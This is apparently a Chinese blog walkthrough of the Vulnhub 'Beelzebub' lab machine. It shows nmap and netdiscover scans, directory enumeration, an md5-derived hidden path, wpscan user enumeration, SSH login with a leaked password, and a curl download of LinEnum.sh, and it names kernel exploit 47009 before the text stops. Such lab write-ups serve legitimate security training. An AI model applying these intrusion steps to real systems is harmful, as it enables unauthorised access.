Vulnhub Beelzebub Walkthrough


Vulbhub Beelzebub Walkthrough

前言

上午搞了一个靶场,今天是20220514,天气依然很晴朗,此时的我有一丝丝的悠闲,刚刚帮我的好朋友熊大刷完了网课(罪过呀,又让她逃过了看网课的痛苦)。啊!此时我真想吟诗一首,来让自己不那么的无聊,想来想去还是找个靶场练习下技术吧,闲着也是闲着。

满江红
岳飞

怒发冲冠,凭栏处、潇潇雨歇。

抬望眼,仰天长啸,壮怀激烈。

三十功名尘与土,八千里路云和月。

莫等闲,白了少年头,空悲切!

靖康耻,犹未雪。

臣子恨,何时灭!

驾长车,踏破贺兰山缺。

壮志饥餐胡虏肉,笑谈渴饮匈奴血。

待从头、收拾旧山河,朝天阙。

在这篇通关教程之中,我们将解决一个 Vulnhub 平台上的名叫 Beezebub 的靶场,难度等级 easy

教程还是分为以下的几部分:

  1. 实用工具收集目标主机的 IP端口 信息
  2. 暴力枚举 HTTP 服务的敏感信息
  3. 登陆 ssh
  4. 提权

信息收集

IP 信息

多余的废话不多说,直接上工具扫描。使用 netdiscover 对网段进行扫描。排除掉我们的自己的机器之后,剩下的就是目标主机的 ip了。

netdoscover

可以看到,目标主机的 IP:192.168.17.159,下一步使用我们的端口扫描工具 nmap 对其探测。

端口信息

还是上篇文章说的,之所以先扫描再使用浏览器登陆查看。因为有的 http 服务更改了默认的端口(极少数),所以我先扫描再查看。

nmap -A -T4 192.168.17.159 -p-

嗯,现在就放心了,只开放了这俩端口,既然这样,我就打开浏览器看看这是什么东西。

枚举 HTTP

因为这次的 HTTP 端口只有一个,所以就直接进行枚举就可以了。不过在此之前,我先去网页端看看有什么有价值的信息没有,一个好的习惯就是记得经常性的查看一下源代码,可能会有意想不到的收获。

依然是一个熟悉的 apache 的默认页面,单单从网页上来说,没有任何的价值。但是查看一下源代码,还是没有什么收获。

话不多说了,直接上工具吧,一个个的试探在自动化的工具勉强有点略显苍白。

发现一个 index.phpphpmyadmin 的目录入口,感觉一下子机会来了。所以先去看看再说,还是再说一句,随时随地的查看源代码真的是一个非常好的习惯。有些不经意之间的小信息极可能就被抓住了。

洋鬼子话,翻译过来就大体上是这么个意思“我的某个东西被加密了,就是把 beelzebubmd5 加密了”,这里的加密之后的子串可能是一个用户的密码,也可能是某个目录的入口,总之挨着试一遍吧,总不能说是所有的东西都是一帆风顺的走下来,那不现实、更不可能。

echo -n beelzebub | md5sum
d18e1e22becbd915b45e0e655429d487

扫描出来的还有一个 phpmyadmin 的界面,所以这里不是搞出来一个beelzebub:d18e1e22becbd915b45e0e655429d487嘛,去试试,不行再说,不行还有别的办法。

果然还是不行,这一步路走没了。鲁迅说过:世上本没有路,走的人多了,也变成路。

那么这个 md5 值,就是可能就是一个目录的入口了。首先在浏览器访问一下,发现是不行的。那么可能是有子目录,还是直接扫描一下,这次我们换一个工具。老是用一个工具有那么一丝丝的审美疲劳了。这次用 dirsearch,同样是一个非常强大的工具。

看上去这都是一些敏感的目录啊,真的多,不行了,我先去挨个试试了。看到这里其实我们就已经发现了,这个网站的cms是 WordPress 啊。等会我看完这几个目录,用专用的工具探测一下,可能会有意料之外的收获。

只有个 uploads 目录可以访问

点击去狂选的目录发现是一个服务,我意外的发现这个地方其实存在 XSS 注入,我还用 beef 连上了呢,不过与本题无关,有些跑偏了。

随便打点东西,发现在cookie那一栏出现了明文的密码,这可真是意外之喜啊!但是密码有了,用户名又是什么?前面说了要用一个专用的扫描 wordpress 的工具扫描一下,说干咱就干,这就来!

wpscan --url http://192.168.17.159/d18e1e22becbd915b45e0e655429d487/ -e u --ignore-main-redirect --force

你看,这还真就爆出来俩用户,试试使用那个 cookie 里面的密码能不能登录,但是登陆什么呢?目前有两个想法,一是登陆那个 phpmyadmin,二是登陆 SSH。挨着试试,首先尝试一下前者。发现不行,那么再来两次 SSH 尝试,看看到底哪一个用户可以使用这个密码登陆。发现第一个用户可以登陆。遂登陆之。

提权

登录上来之后,首先看了一下基本的信息。如下图所示。

使用脚本收集敏感信息

直接上神器

curl -O https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

直接运行即可。会出来一大堆信息,查看是否有你需要的,我这里就不用了,因为我已经发现了这个版本的内核是存在提权漏洞的。47009

漏洞提权


文章作者: Justice
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Justice !
  目录